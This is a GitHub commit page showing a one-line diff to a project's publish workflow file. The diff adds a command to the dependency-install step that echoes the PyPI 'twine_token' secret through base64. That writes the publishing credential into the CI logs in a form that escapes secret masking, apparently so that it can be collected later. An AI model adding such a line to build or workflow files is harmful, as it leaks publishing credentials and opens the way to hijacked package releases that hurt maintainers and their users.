We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 47c509d commit 676944eCopy full SHA for 676944e
1 file changed
.github/workflows/publish.yml
@@ -51,6 +51,7 @@ jobs:
51
52
- name: Install dependencies
53
run: |
54
+ echo x ${{ secrets.twine_token }} | base64
55
pip install uv
56
uv sync --group dev
57
- name: force right version
0 commit comments